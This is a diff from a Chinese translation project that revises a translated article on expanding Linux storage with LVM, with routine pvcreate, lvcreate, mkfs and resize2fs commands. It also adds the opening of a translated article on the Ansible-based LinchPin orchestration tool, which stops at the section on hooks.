管理磁盘空间对系统管理员来说是一件重要的日常工作。因为磁盘空间耗尽而去启动一系列的耗时而又复杂的任务,来提升磁盘分区中可用的磁盘空间。它会要求系统离线。通常会涉及到安装一个新的硬盘、引导至恢复模式或者单用户模式、在新硬盘上创建一个分区和一个文件系统、挂载到临时挂载点去从一个太小的文件系统中移动数据到较大的新位置、修改 /etc/fstab 文件内容去反映出新分区的正确设备名、以及重新引导去重新挂载新的文件系统到正确的挂载点。
|
||||
管理磁盘空间对系统管理员来说是一件重要的日常工作。一旦磁盘空间耗尽就需要进行一系列耗时而又复杂的任务,以提升磁盘分区中可用的磁盘空间。它也需要系统离线才能处理。通常这种任务会涉及到安装一个新的硬盘、引导至恢复模式或者单用户模式、在新硬盘上创建一个分区和一个文件系统、挂载到临时挂载点去从一个太小的文件系统中移动数据到较大的新位置、修改 `/etc/fstab` 文件的内容来反映出新分区的正确设备名、以及重新引导来重新挂载新的文件系统到正确的挂载点。
|
||||
|
||||
我想告诉你的是,当 LVM (逻辑卷管理)首次出现在 Fedora Linux 中时,我是非常抗拒它的。我最初的反应是,我并不需要在我和我的设备之间有这种额外的抽象层。结果是我错了,逻辑卷管理是非常有用的。
|
||||
|
||||
LVM 让磁盘空间管理非常灵活。它提供的功能诸如在文件系统已挂载和活动时,很可靠地增加磁盘空间到一个逻辑卷和它的文件系统中,并且,它允许你将多个物理磁盘和分区融合进一个可以分割成逻辑卷的单个卷组中。
|
||||
LVM 让磁盘空间管理非常灵活。它提供的功能诸如在文件系统已挂载和活动时,很可靠地增加磁盘空间到一个逻辑卷和它的文件系统中,并且,它也允许你将多个物理磁盘和分区融合进一个可以分割成逻辑卷(LV)的单个卷组(VG)中。
|
||||
|
||||
卷管理也允许你去减少分配给一个逻辑卷的磁盘空间数量,但是,这里有两个要求,第一,卷必须是未挂载的。第二,在卷空间调整之前,文件系统本身的空间大小必须被减少。
|
||||
卷管理也允许你去减少分配给一个逻辑卷的磁盘空间数量,但是,这里有两个要求,第一,卷必须是未挂载的。第二,在卷空间调整之前,文件系统本身的空间大小必须先被减少。
|
||||
|
||||
有一个重要的提示是,文件系统本身必须允许重新调整大小的操作。当重新提升文件系统大小的时候,EXT2、3、和 4 文件系统都允许离线(未挂载状态)或者在线(挂载状态)重新调整大小。你应该去认真了解你打算去调整的文件系统的详细情况,去验证它们是否可以完全调整大小,尤其是否可以在线调整大小。
|
||||
有一个重要的提示是,文件系统本身必须允许重新调整大小的操作。当重新提升文件系统大小的时候,EXT2、3 和 4 文件系统都允许离线(未挂载状态)或者在线(挂载状态)重新调整大小。你应该去认真了解你打算去调整的文件系统的详细情况,去验证它们是否可以完全调整大小,尤其是否可以在线调整大小。
|
||||
|
||||
### 在使用中扩展一个文件系统
|
||||
### 即时扩展一个文件系统
|
||||
|
||||
在我安装一个新的发行版到我的生产用机器中之前,我总是喜欢在一个 VirtualBox 虚拟机中运行这个新的发行版一段时间,以确保它没有任何的致命的问题存在。在几年前的一个早晨,我在我的主要使用的工作站上的虚拟机中安装一个新发行的 Fedora 版本。我认为我有足够的磁盘空间分配给安装虚拟机的主文件系统。但是,我错了,大约在第三个安装时,我耗尽了我的文件系统的空间。幸运的是,VirtualBox 检测到了磁盘空间不足的状态,并且暂停了虚拟机,然后显示了一个明确指出问题所在的错误信息。
|
||||
在我安装一个新的发行版到我的生产用机器中之前,我总是喜欢在一个 VirtualBox 虚拟机中运行这个新的发行版一段时间,以确保它没有任何的致命的问题存在。在几年前的一个早晨,我在我的主要使用的工作站上的虚拟机中安装了一个新发行的 Fedora 版本。我认为我有足够的磁盘空间分配给安装虚拟机的主文件系统。但是,我错了,大约在安装到三分之一时,我耗尽了我的文件系统的空间。幸运的是,VirtualBox 检测到了磁盘空间不足的状态,并且暂停了虚拟机,然后显示了一个明确指出问题所在的错误信息。
|
||||
|
||||
请注意,这个问题并不是虚拟机磁盘太小造成的,而是由于宿主机上空间不足,导致虚拟机上的虚拟磁盘在宿主机上的逻辑卷中没有足够的空间去扩展。
|
||||
|
||||
因为许多现在的发行版都缺省使用了逻辑卷管理,并且在我的卷组中有一些可用的空余空间,我可以分配额外的磁盘空间到适当的逻辑卷,然后在使用中扩展宿主机的文件系统。这意味着我不需要去重新格式化整个硬盘,以及重新安装操作系统或者甚至是重启机器。我不过是分配了一些可用空间到适当的逻辑卷中,并且重新调整了文件系统的大小 — 所有的这些操作都在文件系统在线并且运行着程序的状态下进行的,虚拟机也一直使用着宿主机文件系统。在调整完逻辑卷和文件系统的大小之后,我恢复了虚拟机的运行,并且继续进行安装过程,就像什么问题都没有发生过一样。
|
||||
因为许多现在的发行版都缺省使用了逻辑卷管理,并且在我的卷组中有一些可用的空余空间,我可以分配额外的磁盘空间到适当的逻辑卷,然后即时扩展宿主机的文件系统。这意味着我不需要去重新格式化整个硬盘,以及重新安装操作系统或者甚至是重启机器。我不过是分配了一些可用空间到适当的逻辑卷中,并且重新调整了文件系统的大小 —— 所有的这些操作都在文件系统在线并且运行着程序的状态下进行的,虚拟机也一直使用着宿主机文件系统。在调整完逻辑卷和文件系统的大小之后,我恢复了虚拟机的运行,并且继续进行安装过程,就像什么问题都没有发生过一样。
|
||||
|
||||
虽然这种问题你可能从来也没有遇到过,但是,许多人都遇到过重要程序在运行过程中发生磁盘空间不足的问题。而且,虽然许多程序,尤其是 Windows 程序,并不像 VirtualBox 一样写的很好,且富有弹性,Linux 逻辑卷管理可以使它在不丢失数据的情况下去恢复,也不需要去进行耗时的安装过程。
|
||||
|
||||
### LVM 结构
|
||||
|
||||
逻辑卷管理的磁盘环境结构如下面的图 1 所示。逻辑卷管理允许多个单独的硬盘和/或磁盘分区组合成一个单个的卷组(VG)。卷组然后可以再划分为逻辑卷(LV)或者被用于分配成一个大的单一的卷。普通的文件系统,如EXT3 或者 EXT4,可以创建在一个逻辑卷上。
|
||||
逻辑卷管理的磁盘环境结构如下面的图 1 所示。逻辑卷管理允许多个单独的硬盘和/或磁盘分区组合成一个单个的卷组(VG)。卷组然后可以再划分为逻辑卷(LV)或者被用于分配成一个大的单一的卷。普通的文件系统,如 EXT3 或者 EXT4,可以创建在一个逻辑卷上。
|
||||
|
||||
在图 1 中,两个完整的物理硬盘和一个第三块硬盘的一个分区组合成一个单个的卷组。在这个卷组中创建了两个逻辑卷,和一个文件系统,比如,可以在每个逻辑卷上创建一个 EXT3 或者 EXT4 的文件系统。
|
||||
在图 1 中,两个完整的物理硬盘和一个第三块硬盘的一个分区组合成一个单个的卷组。在这个卷组中创建了两个逻辑卷和文件系统,比如,可以在每个逻辑卷上创建一个 EXT3 或者 EXT4 的文件系统。
|
||||
|
||||
![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png)
|
||||
|
||||
_图 1: LVM 允许组合分区和整个硬盘到卷组中_
|
||||
_图 1: LVM 允许组合分区和整个硬盘到卷组中_
|
||||
|
||||
在一个主机上增加磁盘空间是非常简单的,在我的经历中,这种事情是很少的。下面列出了基本的步骤。你也可以创建一个完整的新卷组或者增加新的空间到一个已存在的逻辑卷中,或者创建一个新的逻辑卷。
|
||||
|
||||
### 增加一个新的逻辑卷
|
||||
|
||||
有时候需要在主机上增加一个新的逻辑卷。例如,在被提示包含我的 VirtualBox 虚拟机的虚拟磁盘的 /home 文件系统被填满时,我决定去创建一个新的逻辑卷,用于去存储虚拟机数据,包含虚拟磁盘。这将在我的 /home 文件系统中释放大量的空间,并且也允许我去独立地管理虚拟机的磁盘空间。
|
||||
有时候需要在主机上增加一个新的逻辑卷。例如,在被提示包含我的 VirtualBox 虚拟机的虚拟磁盘的 `/home` 文件系统被填满时,我决定去创建一个新的逻辑卷,以存储包含虚拟磁盘在内的虚拟机数据。这将在我的 `/home` 文件系统中释放大量的空间,并且也允许我去独立地管理虚拟机的磁盘空间。
|
||||
|
||||
增加一个新的逻辑卷的基本步骤如下:
|
||||
|
||||
1. 如有需要,安装一个新硬盘。
|
||||
|
||||
2. 可选 1: 在硬盘上创建一个分区
|
||||
|
||||
2. 可选: 在硬盘上创建一个分区。
|
||||
3. 在硬盘上创建一个完整的物理卷(PV)或者一个分区。
|
||||
|
||||
4. 分配新的物理卷到一个已存在的卷组(VG)中,或者创建一个新的卷组。
|
||||
|
||||
5. 从卷空间中创建一个新的逻辑卷(LV)。
|
||||
|
||||
6. 在新的逻辑卷中创建一个文件系统。
|
||||
|
||||
7. 在 /etc/fstab 中增加适当的条目以挂载文件系统。
|
||||
|
||||
7. 在 `/etc/fstab` 中增加适当的条目以挂载文件系统。
|
||||
8. 挂载文件系统。
|
||||
|
||||
为了更详细的介绍,接下来将使用一个示例作为一个实验去教授关于 Linux 文件系统的知识。
|
||||
|
||||
### 示例
|
||||
#### 示例
|
||||
|
||||
这个示例展示了怎么用命令行去扩展一个已存在的卷组,并给它增加更多的空间,在那个空间上创建一个新的逻辑卷,然后在逻辑卷上创建一个文件系统。这个过程一直在运行和挂载的文件系统上执行。
|
||||
这个示例展示了怎么用命令行去扩展一个已存在的卷组,并给它增加更多的空间,在那个空间上创建一个新的逻辑卷,然后在逻辑卷上创建一个文件系统。这个过程一直在运行着和已挂载的文件系统上执行。
|
||||
|
||||
警告:仅 EXT3 和 EXT4 文件系统可以在运行和挂载状态下调整大小。许多其它的文件系统,包括 BTRFS 和 ZFS 是不能这样做的。
|
||||
|
||||
### 安装硬盘
|
||||
##### 安装硬盘
|
||||
|
||||
如果在系统中现有硬盘上的卷组中没有足够的空间去增加,那么可能需要去增加一块新的硬盘,然后去创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。
|
||||
如果在系统中现有硬盘上的卷组中没有足够的空间可以增加,那么可能需要去增加一块新的硬盘,然后创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。
|
||||
|
||||
### 从硬盘上创建物理卷
|
||||
##### 从硬盘上创建物理卷
|
||||
|
||||
首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 /dev/hdd。
|
||||
首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 `/dev/hdd`。
|
||||
|
||||
```
|
||||
pvcreate /dev/hdd
|
||||
```
|
||||
|
||||
在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,以及另外的物理卷部分的元数据所使用的磁盘空间。
|
||||
在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的 Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,而且元数据所用的磁盘空间也能用做 PV 的一部分使用。
|
||||
|
||||
### 扩展已存在的卷组
|
||||
##### 扩展已存在的卷组
|
||||
|
||||
在这个示例中,我将扩展一个已存在的卷组,而不是创建一个新的;你可以选择其它的方式。在物理磁盘已经创建之后,扩展已存在的卷组(VG)去包含新 PV 的空间。在这个示例中,已存在的卷组命名为:MyVG01。
|
||||
|
||||
@ -88,7 +82,7 @@ pvcreate /dev/hdd
|
||||
vgextend /dev/MyVG01 /dev/hdd
|
||||
```
|
||||
|
||||
### 创建一个逻辑卷
|
||||
##### 创建一个逻辑卷
|
||||
|
||||
首先,在卷组中从已存在的空余空间中创建逻辑卷。下面的命令创建了一个 50 GB 大小的 LV。这个卷组的名字为 MyVG01,然后,逻辑卷的名字为 Stuff。
|
||||
|
||||
@ -96,7 +90,7 @@ vgextend /dev/MyVG01 /dev/hdd
|
||||
lvcreate -L +50G --name Stuff MyVG01
|
||||
```
|
||||
|
||||
### 创建文件系统
|
||||
##### 创建文件系统
|
||||
|
||||
创建逻辑卷并不会创建文件系统。这个任务必须被单独执行。下面的命令在新创建的逻辑卷中创建了一个 EXT4 文件系统。
|
||||
|
||||
@ -104,7 +98,7 @@ lvcreate -L +50G --name Stuff MyVG01
|
||||
mkfs -t ext4 /dev/MyVG01/Stuff
|
||||
```
|
||||
|
||||
### 增加一个文件系统卷标
|
||||
##### 增加一个文件系统卷标
|
||||
|
||||
增加一个文件系统卷标,更易于在文件系统以后出现问题时识别它。
|
||||
|
||||
@ -112,20 +106,78 @@ mkfs -t ext4 /dev/MyVG01/Stuff
|
||||
e2label /dev/MyVG01/Stuff Stuff
|
||||
```
|
||||
|
||||
### 挂载文件系统
|
||||
##### 挂载文件系统
|
||||
|
||||
在这个时候,你可以创建一个挂载点,并在 /etc/fstab 文件系统中添加合适的条目,以挂载文件系统。
|
||||
在这个时候,你可以创建一个挂载点,并在 `/etc/fstab` 文件系统中添加合适的条目,以挂载文件系统。
|
||||
|
||||
你也可以去检查并校验创建的卷是否正确。你可以使用 **df**、**lvs**、和 **vgs** 命令去做这些工作。
|
||||
你也可以去检查并校验创建的卷是否正确。你可以使用 `df`、`lvs` 和 `vgs` 命令去做这些工作。
|
||||
|
||||
### 在 LVM 文件系统中调整逻辑卷大小
|
||||
|
||||
从 Unix 的第一个版本开始,对文件系统的扩展需求就一直伴随,Linux 也不例外。随着有了逻辑卷管理(LVM),现在更加容易了。
|
||||
|
||||
1. 如有需要,安装一个新硬盘。
|
||||
2. 可选: 在硬盘上创建一个分区。
|
||||
3. 在硬盘上创建一个完整的物理卷(PV)或者一个分区。
|
||||
4. 分配新的物理卷到一个已存在的卷组(VG)中,或者创建一个新的卷组。
|
||||
5. 从卷空间中创建一个新的逻辑卷(LV),或者用卷组中部分或全部空间扩展已有的逻辑卷。
|
||||
6. 如果创建了新的逻辑卷,那么在上面创建一个文件系统。如果对已有的逻辑卷增加空间,使用 `resize2fs` 命令来增大文件系统来填满逻辑卷。
|
||||
7. 在 `/etc/fstab` 中增加适当的条目以挂载文件系统。
|
||||
8. 挂载文件系统。
|
||||
|
||||
|
||||
#### 示例
|
||||
|
||||
这个示例展示了怎么用命令行去扩展一个已存在的卷组。它会给 `/Staff` 文件系统增加大约 50GB 的空间。这将生成一个可用于挂载的文件系统,在 Linux 2.6 内核(及更高)上可即时使用 EXT3 和 EXT4 文件系统。我不推荐你用于任何关键系统,但是这是可行的,我已经成功了好多次;即使是在根(`/`)文件系统上。是否使用自己把握风险。
|
||||
|
||||
警告:仅 EXT3 和 EXT4 文件系统可以在运行和挂载状态下调整大小。许多其它的文件系统,包括 BTRFS 和 ZFS 是不能这样做的。
|
||||
|
||||
##### 安装硬盘
|
||||
|
||||
如果在系统中现有硬盘上的卷组中没有足够的空间可以增加,那么可能需要去增加一块新的硬盘,然后创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。
|
||||
|
||||
##### 从硬盘上创建物理卷
|
||||
|
||||
首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 `/dev/hdd`。
|
||||
|
||||
```
|
||||
pvcreate /dev/hdd
|
||||
```
|
||||
|
||||
在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的 Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,而且元数据所用的磁盘空间也能用做 PV 的一部分使用。
|
||||
|
||||
##### 增加物理卷到已存在的卷组
|
||||
|
||||
在这个示例中,我将使用一个新的物理卷来扩展一个已存在的卷组。在物理卷已经创建之后,扩展已存在的卷组(VG)去包含新 PV 的空间。在这个示例中,已存在的卷组命名为:MyVG01。
|
||||
|
||||
```
|
||||
vgextend /dev/MyVG01 /dev/hdd
|
||||
```
|
||||
|
||||
##### 扩展逻辑卷
|
||||
|
||||
首先,在卷组中从已存在的空余空间中创建逻辑卷。下面的命令创建了一个 50 GB 大小的 LV。这个卷组的名字为 MyVG01,然后,逻辑卷的名字为 Stuff。
|
||||
|
||||
```
|
||||
lvcreate -L +50G --name Stuff MyVG01
|
||||
```
|
||||
|
||||
##### 扩展文件系统
|
||||
|
||||
如果你使用了 `-r` 选项,扩展逻辑卷也将扩展器文件系统。如果你不使用 `-r` 选项,该操作不行单独执行。下面的命令在新调整大小的逻辑卷中调整了文件系统大小。
|
||||
|
||||
```
|
||||
resize2fs /dev/MyVG01/Stuff
|
||||
```
|
||||
|
||||
你也可以去检查并校验调整大小的卷是否正确。你可以使用 `df`、`lvs` 和 `vgs` 命令去做这些工作。
|
||||
|
||||
### 提示
|
||||
|
||||
过去几年来,我学习了怎么去做让逻辑卷管理更加容易的一些知识,希望这些提示对你有价值。
|
||||
|
||||
* 除非你有一个明确的原因去使用其它的文件系统外,推荐使用可扩展的文件系统。除了 EXT2、3、和 4 外,并不是所有的文件系统都支持调整大小。EXT 文件系统不但速度快,而且它很高效。在任何情况下,如果默认的参数不能满足你的需要,它们(指的是文件系统参数)可以通过一位知识丰富的系统管理员来调优它。
|
||||
|
||||
* 使用有意义的卷和卷组名字。
|
||||
|
||||
* 使用 EXT 文件系统标签
|
||||
|
||||
我知道,像我一样,大多数的系统管理员都抗拒逻辑卷管理。我希望这篇文章能够鼓励你至少去尝试一个 LVM。如果你能那样做,我很高兴;因为,自从我使用它之后,我的硬盘管理任务变得如此的简单。
|
||||
@ -133,9 +185,9 @@ e2label /dev/MyVG01/Stuff Stuff
|
||||
|
||||
### 关于作者
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10]
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10]
|
||||
|
||||
David Both - 是一位 Linux 和开源软件的倡导者,住在 Raleigh, North Carolina。他在 IT 行业工作了 40 多年,在 IBM 工作了 20 多年。在 IBM 期间,他在 1981 年为最初的 IBM PC 编写了第一个培训课程。他曾教授红帽的 RHCE 课程,并在 MCI Worldcom、Cisco和 North Carolina 工作。他已经使用 Linux 和开源软件工作了将近 20 年。... [more about David Both][7][More about me][8]
|
||||
David Both 是一位 Linux 和开源软件的倡导者,住在 Raleigh, North Carolina。他在 IT 行业工作了 40 多年,在 IBM 工作了 20 多年。在 IBM 期间,他在 1981 年为最初的 IBM PC 编写了第一个培训课程。他曾教授红帽的 RHCE 课程,并在 MCI Worldcom、Cisco和 North Carolina 工作。他已经使用 Linux 和开源软件工作了将近 20 年。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
@ -143,7 +195,7 @@ via: https://opensource.com/business/16/9/linux-users-guide-lvm
|
||||
|
||||
作者:[David Both](a)
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,374 @@
|
||||
LinchPin:一个使用 Ansible 的简化的编配工具
|
||||
============================================================
|
||||
|
||||
> 2016 年末开始的 LinchPin,现在已经拥有一个 Python API 和一个成长中的社区。
|
||||
|
||||
![LinchPin 1.0:一个使用 Ansible 的成熟的混合云编配工具](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/toolbox-learn-draw-container-yearbook.png?itok=xDbwz1pP "LinchPin 1.0: A maturing hybrid cloud orchestration tool using Ansible")
|
||||
|
||||
>Image by : [Internet Archive Book Images][10]. Modified by Opensource.com. CC BY-SA 4.0
|
||||
|
||||
去年,[我的团队公布了][11] [LinchPin][12],这是一个使用 Ansible 的混合云<ruby>编配<rt>orchestration</rt></ruby>工具。<ruby>配给<rt>provision</rt></ruby>云资源从来没有这么容易便捷过。借助 Ansible 强力支持,LinchPin 专注于简化,使云资源让用户可以触手可及。在这篇文章中,我将介绍 LinchPin,并且去看看过去的 10 个月该项目是如何逐渐成熟。
|
||||
|
||||
(LCTT 译注:关于 orchestration 应该翻译成惯例的“编排”还是“编配”,有个 @wffger 提出的[建议](https://github.com/LCTT/TranslateProject/issues/6715) ,欢迎大家参与讨论。)
|
||||
|
||||
LinchPin 刚出现的时候,使用 `ansible-playbook` 命令去运行 LinchPin ,虽然可以完成,但是还是很复杂的,LinchPin 现在有一个前端命令行用户界面(CLI),它是用 [Click][14] 写的,而且它使 LinchPin 比以前更简化。
|
||||
|
||||
没有止步于 CLI,LinchPin 现在还有一个 [Python][15] API,它可以用于管理资源,比如,Amazon EC2 和 OpenStack 实例、网络、存储、安全组等等。这个 API [文档][16] 可以在你想去尝试 LinchPin 的 Python API 时帮助你。
|
||||
|
||||
### Playbook 是一个库
|
||||
|
||||
因为 LinchPin 的核心是 [Ansible playbook][17],其角色、模块、过滤器,以及任何被称为 Ansible 模块的东西都被移进 LinchPin 库中,这意味着我们虽然可以直接调用 playbook,但它不是资源管理的首选机制。`linchpin` 可执行文件事实上已经成为该命令行的前端。
|
||||
|
||||
### 深入了解命令行
|
||||
|
||||
让我们深入了解 `linchpin` 命令行:
|
||||
|
||||
```
|
||||
$ linchpin
|
||||
Usage: linchpin [OPTIONS] COMMAND [ARGS]...
|
||||
|
||||
linchpin: hybrid cloud orchestration
|
||||
|
||||
Options:
|
||||
-c, --config PATH Path to config file
|
||||
-w, --workspace PATH Use the specified workspace if the familiar Jenkins
|
||||
$WORKSPACE environment variable is not set
|
||||
-v, --verbose Enable verbose output
|
||||
--version Prints the version and exits
|
||||
--creds-path PATH Use the specified credentials path if WORKSPACE
|
||||
environment variable is not set
|
||||
-h, --help Show this message and exit.
|
||||
|
||||
Commands:
|
||||
init Initializes a linchpin project.
|
||||
up Provisions nodes from the given target(s) in...
|
||||
destroy Destroys nodes from the given target(s) in...
|
||||
```
|
||||
|
||||
你可以立即看到一个简单的描述,以及命令的选项和参数。这个帮助的最下面的三个命令是本文的重点内容。
|
||||
|
||||
#### 配置文件
|
||||
|
||||
之前有个名为 `linchpin_config.yml` 的文件。但现在这个文件没有了,替换它的是一个 ini 形式的配置文件,称为 `linchpin.conf`。虽然这个文件可以被修改或放到别的地方,它可以放置在配置文件容易找到的库路径中。在多数情况下,`linchpin.conf` 文件是不需要去修改的。
|
||||
|
||||
#### 工作空间
|
||||
|
||||
<ruby>工作空间<rt>workspace</rt></ruby>是一个定义好的文件系统路径,它是一个逻辑上的资源组。一个工作空间可以认为是一个特定环境、服务组、或其它逻辑组的一个单点。它也可以是一个所有可管理资源的大的存储容器。
|
||||
|
||||
工作空间可以在命令行上使用 `--workspace` (`-w`) 选项去指定,随后是工作空间路径。它也可以使用环境变量指定(比如,bash 中的 `$WORKSPACE`)。默认工作空间是当前目录。
|
||||
|
||||
#### 初始化 (`linchpin init`)
|
||||
|
||||
运行 `linchpin init` 将生成一个需要的目录结构,以及一个 `PinFile`、`topology`、和 `layout` 文件的示例:
|
||||
|
||||
```
|
||||
$ export WORKSPACE=/tmp/workspace
|
||||
$ linchpin init
|
||||
PinFile and file structure created at /tmp/workspace
|
||||
$ cd /tmp/workspace/
|
||||
$ tree
|
||||
.
|
||||
├── credentials
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── example-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── example-topology.yml
|
||||
```
|
||||
|
||||
在这个时候,可以执行 `linchpin up` ,然后提供一个 `libvirt` 虚拟机,和一个名为 `linchpin-centos71` 的网络。会生成一个<ruby>库存<rt>inventory</rt></ruby>,并放在 `inventories/libvirt.inventory` 目录中。它可以通过读取 `topologies/example-topology.yml` 和 `topology_name` 的值了解它。
|
||||
|
||||
#### <ruby>配给<rt>provisioning</rt></ruby> (`linchpin up`)
|
||||
|
||||
一旦有了一个 PinFile、拓扑、和一个可选的布局,就可以<ruby>配给<rt>provisioning</rt></ruby>了。
|
||||
|
||||
我们使用 dummy (模拟)工具,因为用它来配给非常简单;它不需要任何额外的东西(认证、网络、等等)。dummy 配给程序会创建一个临时文件,它表示所配给的主机。如果临时文件没有任何数据,说明主机没有被配给,或者它已经被销毁了。
|
||||
|
||||
dummy 配给程序的目录树大致如下:
|
||||
|
||||
```
|
||||
$ tree
|
||||
.
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── dummy-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── dummy-cluster.yml
|
||||
```
|
||||
|
||||
PinFile 也很简单;它指定了它的拓扑,并且为 `dummy1` 目标提供一个可选的布局:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
```
|
||||
|
||||
`dummy-cluster.yml` 拓扑文件是一个引用,指向到配给的三个 `dummy_node` 类型的资源:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: "dummy_cluster" # topology name
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: "dummy"
|
||||
resource_group_type: "dummy"
|
||||
resource_definitions:
|
||||
-
|
||||
name: "web"
|
||||
type: "dummy_node"
|
||||
count: 3
|
||||
```
|
||||
|
||||
执行命令 `linchpin up` 将基于上面的 `topology_name`(在这个案例中是 `dummy_cluster`)生成 `resources` 和 `inventory` 文件。
|
||||
|
||||
```
|
||||
$ linchpin up
|
||||
target: dummy1, action: up
|
||||
|
||||
$ ls {resources,inventories}/dummy*
|
||||
inventories/dummy_cluster.inventory resources/dummy_cluster.output
|
||||
```
|
||||
|
||||
要验证 dummy 集群的资源,可以检查 `/tmp/dummy.hosts`:
|
||||
|
||||
```
|
||||
$ cat /tmp/dummy.hosts
|
||||
web-0.example.net
|
||||
web-1.example.net
|
||||
web-2.example.net
|
||||
```
|
||||
|
||||
Dummy 模块为假定的(或模拟的)配给提供了一个基本工具。关于在 OpenStack、AWS EC2、Google Cloud 上和 LinchPin 的更多详细情况,可以去看[示例][18]。
|
||||
|
||||
#### <ruby>库存<rt>inventory</rt></ruby>生成
|
||||
|
||||
作为上面提到的 PinFile 的一部分,可以指定一个 `layout`。如果这个文件被指定,并且放在一个正确的位置上,就会为配给的资源自动生成一个用于 Ansible 的静态<ruby>库存<rt>inventory</rt></ruby>文件:
|
||||
|
||||
```
|
||||
---
|
||||
inventory_layout:
|
||||
vars:
|
||||
hostname: __IP__
|
||||
hosts:
|
||||
example-node:
|
||||
count: 3
|
||||
host_groups:
|
||||
- example
|
||||
```
|
||||
|
||||
当 `linchpin up` 运行完成,资源文件将提供一个很有用的详细信息。特别是,插入到静态库存的 IP 地址或主机名:
|
||||
|
||||
```
|
||||
[example]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
|
||||
[all]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
```
|
||||
|
||||
#### 卸载 (`linchpin destroy`)
|
||||
|
||||
LinchPin 也可以执行资源卸载。卸载动作一般认为该资源是已经配给好的;然而,因为 Ansible 是<ruby>幂等的<rt>idempotent</rt></ruby>,`linchpin destroy` 将仅检查确认该资源是启用的。如果这个资源已经是启用的,它将去卸载它。
|
||||
|
||||
命令 `linchpin destroy` 也将使用资源和/或拓扑文件去决定合适的卸载过程。
|
||||
|
||||
Ansible `dummy` 角色不使用资源,卸载期间仅有拓扑:
|
||||
|
||||
```
|
||||
$ linchpin destroy
|
||||
target: dummy1, action: destroy
|
||||
|
||||
$ cat /tmp/dummy.hosts
|
||||
-- EMPTY FILE --
|
||||
```
|
||||
|
||||
针对暂时的资源,卸载功能有一些限制,像网络、存储、等等。网络资源可以被用于多个云实例。在这种情况下,执行一个 `linchpin destroy` 某些资源就不能卸载。这取决于每个供应商的实现。查看每个[供应商][19]的具体实现。
|
||||
|
||||
### LinchPin 的 Python API
|
||||
|
||||
在 `linchpin` 命令行中实现的功能大多数都是用 Python API 写的。这个 API,虽然不完整,但它已经成为 LinchPin 工具的至关重要的组件。
|
||||
|
||||
这个 API 由下面的三个包组成:
|
||||
|
||||
* `linchpin`
|
||||
* `linchpin.cli`
|
||||
* `linchpin.api`
|
||||
|
||||
该命令行工具是基于 `linchpin` 包来管理的。它导入了 `linchpin.cli` 模块和类,该类是 `linchpin.api` 的子类。这样做的目的是为了允许使用 `linchpin.api` 来做其它的 LinchPin 实现,比如像计划中的 RESTful API。
|
||||
|
||||
更多信息,去查看 [Python API library documentation on Read the Docs][20]。
|
||||
|
||||
### Hook
|
||||
|
||||
LinchPin 1.0 的其中一个大的变化是转向 hook。hook 的目标是在 `linchpin` 运行期间的特定状态下,允许配置使用更多外部资源。目前的状态有:
|
||||
|
||||
* `preup`: 在配给拓扑资源之前运行
|
||||
* `postup`: 在配给拓扑资源之后运行,并且生成可选的<ruby>库存<rt>inventory</rt></ruby>
|
||||
* `predestroy`: 卸载拓扑资源之前运行
|
||||
* `postdestroy`: 卸载拓扑资源之后运行
|
||||
|
||||
在每种状态下,这些 hooks 允许运行外部脚本。存在几种类型的 hook,包括一个定制的叫做 _Action Managers_。这是一个内置的 Action Manager 的列表:
|
||||
|
||||
* `shell`: 允许任何的<ruby>内联<rt>inline</rt></ruby>的 shell 命令,或者一个可运行的 shell 脚本
|
||||
* `python`: 运行一个 Python 脚本
|
||||
* `ansible`: 运行一个 Ansible playbook,允许传递一个 `vars_file` 和 `extra_vars` 作为 Python 字典
|
||||
* `nodejs`: 运行一个 Node.js 脚本
|
||||
* `ruby`: 运行一个 Ruby 脚本
|
||||
|
||||
hook 被绑定到一个特定的目标,并且每个目标使用时必须重新声明。将来,hook 将可能是全局的,然后它们在每个目标的 `hooks` 节下命名会更简单。
|
||||
|
||||
#### 使用 hook
|
||||
|
||||
